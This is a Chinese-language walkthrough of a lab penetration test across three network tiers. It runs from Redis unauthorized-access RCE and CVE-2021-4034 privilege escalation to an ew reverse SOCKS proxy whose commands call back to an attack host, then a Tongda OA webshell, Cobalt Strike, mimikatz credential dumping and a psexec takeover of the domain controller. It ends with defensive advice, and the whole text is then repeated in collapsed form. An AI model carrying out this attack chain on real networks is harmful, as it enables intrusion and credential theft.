三层网络环境下的域渗透实战教学

网络拓扑与环境说明

网络结构

DMZ区域：
- Ubuntu1服务器：配置双网卡
  - 网卡1：桥接模式（对外提供服务）
  - 网卡2：连接VMnet8（连通第二层网络）
第二层网络区域：
- Ubuntu2和Windows7：均配置双网卡
  - 网卡1：连接VMnet8（连通第二层网络）
  - 网卡2：连接VMnet14（连通第三层网络）
第三层网络区域：
- Windows Server 2012和Windows7：单网卡
  - 网卡1：连接VMnet14（连通第三层网络）

外网Web渗透阶段

1. 资产发现与扫描

使用Kscan资产收集工具扫描发现：

开放服务：Nginx、SSH、Redis
Redis服务存在未授权访问漏洞

2. Redis漏洞利用

Redis未授权访问的几种利用方式：

写入Webshell
计划任务反弹shell（CentOS适用）
写入SSH公钥
主从复制RCE

选择主从复制RCE利用：

工具：redis-rogue-server (https://github.com/n0b0dyCN/redis-rogue-server)
成功获取初始shell

3. 建立持久化会话

使用MSF生成Linux木马
Python开启HTTP服务托管木马
MSF设置监听
目标Ubuntu1执行木马，获得Meterpreter会话

4. 权限提升

上传Linux提权辅助脚本：
- 工具：linux-exploit-suggester (https://github.com/mzet-/linux-exploit-suggester)
检测到CVE-2021-4034漏洞
利用该漏洞成功获取root权限
生成root权限的Linux木马，建立root用户的Meterpreter会话

内网渗透（横向移动）

1. 网络发现

发现目标主机存在两个网卡
使用MSF添加路由：route add 192.168.52.0 255.255.255.0 [session_id]

2. 内网扫描

使用Fscan扫描第二网卡网段(192.168.52.0/24)发现：

192.168.52.30：通达OA系统
存在MS17-010漏洞

3. 代理建立

使用ew建立反向socks5代理：

攻击机设置：

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

DMZ区Ubuntu1：

ew_for_linux64 -s rssocks -d 192.168.137.49 -e 1234

配置Proxifier使用攻击机的1080端口访问内网

4. 通达OA利用

查看通达OA版本
使用通达OA综合利用工具检测漏洞
使用蚁剑连接Webshell

域内渗透

1. 信息收集

本机信息：system权限
路由信息：ipconfig /all显示两个网段(52.0/24和93.0/24)
发现域：whoamianony.org
域控：192.168.93.30
当前主机名：pc1

2. 上线Cobalt Strike

直接执行命令上线CS
使用mimikatz导出凭据：
- 域管密码
- bunny域用户密码

3. 域信息收集

获取所有域用户列表
获取域管账户信息
确认域控信息

4. 端口扫描

使用CS自带的端口扫描对93网段探测：

确认192.168.93.30为域控

5. 域控攻击

使用SMB beacon进行psexec攻击域控，完成三层网络渗透

关键工具总结

扫描工具：
- Kscan：外网资产发现
- Fscan：内网资产扫描
漏洞利用工具：
- redis-rogue-server：Redis主从复制RCE
- linux-exploit-suggester：Linux提权检测
- 通达OA综合利用工具
代理工具：
- ew：内网代理建立
后渗透工具：
- Metasploit Framework
- Cobalt Strike
- mimikatz
Webshell管理：
- 蚁剑

技术要点总结

Redis未授权访问的多种利用方式选择
Linux提权的检测与利用流程
多层网络环境下的路由添加与代理建立
域环境渗透的标准流程：
- 信息收集
- 凭据获取
- 横向移动
- 域控攻击
工具链的组合使用：从外网到内网再到域控的完整攻击路径

防御建议

Redis服务：
- 设置密码认证
- 限制绑定IP
- 禁用高危命令
Linux系统：
- 及时更新补丁
- 限制sudo权限
- 监控异常进程
域环境：
- 实施最小权限原则
- 启用LSA保护
- 监控异常登录行为
- 定期更换高权限账户密码
网络架构：
- 严格划分网络区域
- 实施适当的ACL规则
- 监控跨网段流量
OA系统：
- 及时更新补丁
- 禁用不必要的功能
- 实施WAF防护

三层网络环境下的域渗透实战教学网络拓扑与环境说明网络结构 DMZ区域： Ubuntu1服务器：配置双网卡网卡1：桥接模式（对外提供服务）网卡2：连接VMnet8（连通第二层网络）第二层网络区域： Ubuntu2和Windows7：均配置双网卡网卡1：连接VMnet8（连通第二层网络）网卡2：连接VMnet14（连通第三层网络）第三层网络区域： Windows Server 2012和Windows7：单网卡网卡1：连接VMnet14（连通第三层网络）外网Web渗透阶段 1. 资产发现与扫描使用Kscan资产收集工具扫描发现：开放服务：Nginx、SSH、Redis Redis服务存在未授权访问漏洞 2. Redis漏洞利用 Redis未授权访问的几种利用方式：写入Webshell 计划任务反弹shell（CentOS适用）写入SSH公钥主从复制RCE 选择主从复制RCE利用：工具：redis-rogue-server (https://github.com/n0b0dyCN/redis-rogue-server) 成功获取初始shell 3. 建立持久化会话使用MSF生成Linux木马 Python开启HTTP服务托管木马 MSF设置监听目标Ubuntu1执行木马，获得Meterpreter会话 4. 权限提升上传Linux提权辅助脚本：工具：linux-exploit-suggester (https://github.com/mzet-/linux-exploit-suggester) 检测到CVE-2021-4034漏洞利用该漏洞成功获取root权限生成root权限的Linux木马，建立root用户的Meterpreter会话内网渗透（横向移动） 1. 网络发现发现目标主机存在两个网卡使用MSF添加路由： route add 192.168.52.0 255.255.255.0 [session_id] 2. 内网扫描使用Fscan扫描第二网卡网段(192.168.52.0/24)发现： 192.168.52.30：通达OA系统存在MS17-010漏洞 3. 代理建立使用ew建立反向socks5代理：攻击机设置： DMZ区Ubuntu1：配置Proxifier使用攻击机的1080端口访问内网 4. 通达OA利用查看通达OA版本使用通达OA综合利用工具检测漏洞使用蚁剑连接Webshell 域内渗透 1. 信息收集本机信息：system权限路由信息：ipconfig /all显示两个网段(52.0/24和93.0/24) 发现域：whoamianony.org 域控：192.168.93.30 当前主机名：pc1 2. 上线Cobalt Strike 直接执行命令上线CS 使用mimikatz导出凭据：域管密码 bunny域用户密码 3. 域信息收集获取所有域用户列表获取域管账户信息确认域控信息 4. 端口扫描使用CS自带的端口扫描对93网段探测：确认192.168.93.30为域控 5. 域控攻击使用SMB beacon进行psexec攻击域控，完成三层网络渗透关键工具总结扫描工具： Kscan：外网资产发现 Fscan：内网资产扫描漏洞利用工具： redis-rogue-server：Redis主从复制RCE linux-exploit-suggester：Linux提权检测通达OA综合利用工具代理工具： ew：内网代理建立后渗透工具： Metasploit Framework Cobalt Strike mimikatz Webshell管理：蚁剑技术要点总结 Redis未授权访问的多种利用方式选择 Linux提权的检测与利用流程多层网络环境下的路由添加与代理建立域环境渗透的标准流程：信息收集凭据获取横向移动域控攻击工具链的组合使用：从外网到内网再到域控的完整攻击路径防御建议 Redis服务：设置密码认证限制绑定IP 禁用高危命令 Linux系统：及时更新补丁限制sudo权限监控异常进程域环境：实施最小权限原则启用LSA保护监控异常登录行为定期更换高权限账户密码网络架构：严格划分网络区域实施适当的ACL规则监控跨网段流量 OA系统：及时更新补丁禁用不必要的功能实施WAF防护